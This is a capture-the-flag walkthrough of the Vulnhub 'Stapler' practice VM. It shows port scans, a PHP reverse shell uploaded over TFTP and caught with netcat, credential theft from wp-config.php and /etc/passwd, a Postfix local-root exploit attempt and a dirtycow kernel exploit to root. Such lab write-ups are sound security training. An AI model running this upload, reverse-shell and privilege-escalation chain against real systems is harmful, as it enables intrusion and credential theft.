[Vulnhub] stapler - Walkthrough
Vulnhub URI: https://www.vulnhub.com/entry/stapler-1,150/
Victim: 192.168.56.103
Attacker: 192.168.56.102
I used the silliest way to root this VM so do not laugh at me...
First netdiscover -r 192.168.56.0/24 to find the victim's IP.
Then a quick nmap
root@kali:~/vulnerhub/stapler# cat nmap.rst
Starting Nmap 7.50 ( https://nmap.org ) at 2017-08-24 11:49 EDT
Nmap scan report for 192.168.56.103
Host is up (-0.0050s latency).
Not shown: 992 filtered ports
PORT STATE SERVICE
20/tcp closed ftp-data
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
80/tcp open http
139/tcp open netbios-ssn
666/tcp open doom
3306/tcp open mysql
MAC Address: 08:00:27:AB:FF:C8 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 37.33 seconds
Several ports are open, checked 80 port first.
It looks like a vulnerable site because it seems just fetch files from the server and return to users.
nikto didn't return me anything but dirb gives me interesting entries:
root@kali:~/vulnerhub/stapler# dirb http://192.168.56.103 /usr/share/wordlists/dirb/big.txt -X ,.php,.js,.html
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Aug 24 15:20:57 2017
URL_BASE: http://192.168.56.103/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt
EXTENSIONS_LIST: (,.php,.js,.html) | ()(.php)(.js)(.html) [NUM = 4]
-----------------
GENERATED WORDS: 20458
---- Scanning URL: http://192.168.56.103/ ----
+ http://192.168.56.103/.bashrc (CODE:200|SIZE:3771)
+ http://192.168.56.103/.profile (CODE:200|SIZE:675)
(!) FATAL: Too many errors connecting to host
(Possible cause: EMPTY REPLY FROM SERVER)
-----------------
END_TIME: Thu Aug 24 15:21:08 2017
DOWNLOADED: 9600 - FOUND: 2
Looks like the location of the web content is a home directory.
I tried ../../../../../etc/passwd, .bash_history, .ssh/know_hosts, but they didn't work which means it is either restricting dir changing or just a trolling page.
Assume it's the good situation, so if we could find a way to upload a file to here we might be able to get a shell or prove it's a fake page.
At this time my nmap finished the udp scan. And the result is promising:
root@kali:~/vulnerhub/stapler/note# nmap -Pn -sU 192.168.56.103
Starting Nmap 7.50 ( https://nmap.org ) at 2017-08-24 12:08 EDT
Stats: 0:10:02 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 57.19% done; ETC: 12:25 (0:07:19 remaining)
Nmap scan report for 192.168.56.103
Host is up (0.00055s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
53/udp open domain
68/udp open|filtered dhcpc
69/udp open|filtered tftp
137/udp open netbios-ns
138/udp open|filtered netbios-dgm
MAC Address: 08:00:27:AB:FF:C8 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 1100.98 seconds
Look that! tftp!
root@kali:~/vulnerhub/stapler# tftp
tftp> connect 192.168.56.103
tftp> get .bashrc
Received 3888 bytes in 0.0 seconds
tftp> put shell.php
Sent 5688 bytes in 0.0 seconds
tftp>
Great!
Looks like the tftp is located at the same directory as the 80 port service, and I can upload a file to that path.
My shell.php is based on /usr/share/webshells/php/php-reverse-shell.php
Time to receive the shell.
Go and visit http://192.168.56.103/shell.php, then the shell comes:
root@kali:~/vulnerhub/stapler# nc -l -p 9004
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
15:35:36 up 2:49, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1028(www) gid=1028(www) groups=1028(www)
/bin/sh: 0: can't access tty; job control turned off
$ pwd
/
$ cd /home/www
$ ls -la
total 72
drwxrwxrwx 2 www www 4096 Aug 24 14:50 .
drwxr-xr-x 32 root root 4096 Jun 4 2016 ..
-rw-r--r-- 1 www www 220 Sep 1 2015 .bash_logout
-rw-r--r-- 1 www www 3771 Sep 1 2015 .bashrc
-rw-r--r-- 1 www www 675 Sep 1 2015 .profile
-rw-r--r-- 1 nobody nogroup 5496 Aug 24 15:31 shell.php
All right, the privilege escalating part.
Honestly, my first thought is to exploit overlayfs or use cowroot because of the version is old. But I want to explore more before fire the bullet.
So I did some recon work.
/etc/passwd:
root:x:0:0:root:/root:/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/bin/false
messagebus:x:108:111::/var/run/dbus:/bin/false
sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin
peter:x:1000:1000:Peter,,,:/home/peter:/bin/zsh
mysql:x:111:117:MySQL Server,,,:/nonexistent:/bin/false
RNunemaker:x:1001:1001::/home/RNunemaker:/bin/bash
ETollefson:x:1002:1002::/home/ETollefson:/bin/bash
DSwanger:x:1003:1003::/home/DSwanger:/bin/bash
AParnell:x:1004:1004::/home/AParnell:/bin/bash
SHayslett:x:1005:1005::/home/SHayslett:/bin/bash
MBassin:x:1006:1006::/home/MBassin:/bin/bash
JBare:x:1007:1007::/home/JBare:/bin/bash
LSolum:x:1008:1008::/home/LSolum:/bin/bash
IChadwick:x:1009:1009::/home/IChadwick:/bin/false
MFrei:x:1010:1010::/home/MFrei:/bin/bash
SStroud:x:1011:1011::/home/SStroud:/bin/bash
CCeaser:x:1012:1012::/home/CCeaser:/bin/dash
JKanode:x:1013:1013::/home/JKanode:/bin/bash
CJoo:x:1014:1014::/home/CJoo:/bin/bash
Eeth:x:1015:1015::/home/Eeth:/usr/sbin/nologin
LSolum2:x:1016:1016::/home/LSolum2:/usr/sbin/nologin
JLipps:x:1017:1017::/home/JLipps:/bin/sh
jamie:x:1018:1018::/home/jamie:/bin/sh
Sam:x:1019:1019::/home/Sam:/bin/zsh
Drew:x:1020:1020::/home/Drew:/bin/bash
jess:x:1021:1021::/home/jess:/bin/bash
SHAY:x:1022:1022::/home/SHAY:/bin/bash
Taylor:x:1023:1023::/home/Taylor:/bin/sh
mel:x:1024:1024::/home/mel:/bin/bash
kai:x:1025:1025::/home/kai:/bin/sh
zoe:x:1026:1026::/home/zoe:/bin/bash
NATHAN:x:1027:1027::/home/NATHAN:/bin/bash
www:x:1028:1028::/home/www:
postfix:x:112:118::/var/spool/postfix:/bin/false
ftp:x:110:116:ftp daemon,,,:/var/ftp:/bin/false
elly:x:1029:1029::/home/elly:/bin/bash
And I checked all of there home directory but no one has any interesting files.
netstat:
$ netstat -nplt
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 1434/php
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:8888 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:666 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN -
tcp6 0 0 :::139 :::* LISTEN -
tcp6 0 0 :::53 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::12380 :::* LISTEN -
tcp6 0 0 :::12380 :::* LISTEN -
tcp6 0 0 :::12380 :::* LISTEN -
tcp6 0 0 :::445 :::* LISTEN -
/var/www/:
$ pwd
/var/www/https
$ ls -la
total 460
drwxr-xr-x 5 root root 4096 Jun 5 2016 .
drwxr-xr-x 3 root root 4096 Jun 6 2016 ..
drwxr-xr-x 2 root root 4096 Jun 3 2016 admin112233
drwxr-xr-x 2 root root 4096 Jun 4 2016 announcements
drwxr-xr-x 5 root root 4096 Jun 4 2016 blogblog
-rw-r--r-- 1 root root 434538 Jun 3 2016 custom_400.html
-rw-r--r-- 1 root root 92 Jun 4 2016 .htaccess
-rw-r--r-- 1 root root 21 Jun 5 2016 index.html
-rw-r--r-- 1 root root 59 Jun 3 2016 robots.txt
$ cat robots.txt
User-agent: *
Disallow: /admin112233/
Disallow: /blogblog/
Here I found something, like the credentials for mysql.
$ cd blogblog
$ ls
index.php
license.txt
readme.html
wordpress-4.2.1.tar.gz
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config.php
wp-config-sample.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php
$ cat wp-config.php | grep DB_
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'plbkac');
define('DB_HOST', 'localhost');
define('DB_CHARSET', 'utf8mb4');
define('DB_COLLATE', '');
$
So login to mysql:
root@kali:~/vulnerhub/stapler# mysql -h 192.168.56.103 -u root -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 11
Server version: 5.7.12-0ubuntu1 (Ubuntu)
Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| loot |
| mysql |
| performance_schema |
| phpmyadmin |
| proof |
| sys |
| wordpress |
+--------------------+
8 rows in set (0.00 sec)
There are many password and usernames inside those dbs, but I'm not sure which are for ssh.
At this point, I back to the reverse shell and tried to follow the traditional way:
$ find / -xdev -perm /6000 \( -user root -o -group root \) 2>/dev/null
/var/mail
/var/local
/usr/bin/newuidmap
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/expiry
/usr/bin/newgidmap
/usr/bin/ssh-agent
/usr/bin/chage
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/wall
/usr/bin/crontab
/usr/bin/gpasswd
/usr/bin/ubuntu-core-launcher
/usr/bin/screen
/usr/local/share/fonts
/usr/local/share/zsh/site-functions
/usr/local/share/sgml
/usr/local/share/sgml/dtd
/usr/local/share/sgml/entities
/usr/local/share/sgml/misc
/usr/local/share/sgml/declaration
/usr/local/share/sgml/stylesheet
/usr/local/share/xml
/usr/local/share/xml/schema
/usr/local/share/xml/entities
/usr/local/share/xml/misc
/usr/local/share/xml/declaration
/usr/local/lib/python3.5
/usr/local/lib/python3.5/dist-packages
/usr/local/lib/python2.7
/usr/local/lib/python2.7/dist-packages
/usr/local/lib/python2.7/site-packages
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/i386-linux-gnu/lxc/lxc-user-nic
/usr/lib/i386-linux-gnu/utempter/utempter
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/authbind/helper
/usr/sbin/postqueue
/usr/sbin/postdrop
/bin/mount
/bin/umount
/bin/ping
/bin/fusermount
/bin/ping6
/bin/su
/sbin/unix_chkpwd
/sbin/pam_extrausers_chkpwd
Here I saw two files: postqueue and postdrop. Googled it, turns out they are belong to postfix service which showed up in /etc/passwd.
Searched for it's exploitation and I found one, https://www.exploit-db.com/exploits/6337/
But it didn't work because I do not have write permission to /var/mail:
$ ./epl.sh
#
# "rs_pocfix.sh" (PoC for Postfix local root vulnerability: CVE-2008-2936)
# by Roman Medina-Heigl Hernandez a.k.a. RoMaNSoFt <roman@rs-labs.com>
#
# Tested: Ubuntu / Debian
#
# [ Madrid, 30.Aug.2008 ]
#
[*] Postfix seems to be installed
[*] Hardlink to symlink not dereferenced
[!] Spool dir is not writable
And that dir is belong to www-data but I was login as www.
$ ls -l /var/mail
total 48
-rw-r--r-- 1 root mail 1 Jun 4 2016 root
-rw------- 1 www-data mail 39991 Jun 5 2016 www-data
$ whoami
www
All I need is data :D
So I was wondering if I can start some web service and get the reverse shell of www-data then use this exploitation.
Or, if I found a way to ssh in as another user maybe there another way waiting for me.
So I start to try those kernel exploitation at this point. :D
First I tried overlayfs but it's not vulnerable, then I tried cowroot and then I back to mysql to search for more information without check the result (I though it was stuck! seriously)
I did find many hashed passwords and messages inside the db but I can't decrypt them with john in the short time.
When I decoding those passwords, I back to the 'stuck' reverse shell and type something:
$ ./cowroot
whoami
root
cd /root
ls
fix-wordpress.sh
flag.txt
issue
python.sh
wordpress.sql
cat flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
.-'''''-.
|'-----'|
|-.....-|
| |
| |
_,._ | |
__.o` o`"-. | |
.-O o `"-.o O )_,._ | |
( o O o )--.-"`O o"-.`'-----'`
'--------' ( o O o)
`----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b
Oh my. Happiness came without being prepared.
other things
Oh besides, I've also tried other ports.
from 666 port I got a message2.jpg, which looks like this:
And also:
root@kali:~/vulnerhub/stapler/message# steghide --info message2.jpg
"message2.jpg":
format: jpeg
capacity: 318.0 Byte
Try to get information about embedded data ? (y/n) y
Enter passphrase:
steghide: could not extract any data with that passphrase!
I didn't figure out the password yet.
(please check the previous part for root and flag)
Again, dirtycow is really powerful.
There are other ways to get reverse shell and root it, I believe other ways are more interesting.
Thanks g0tmi1k for providing this good practise.
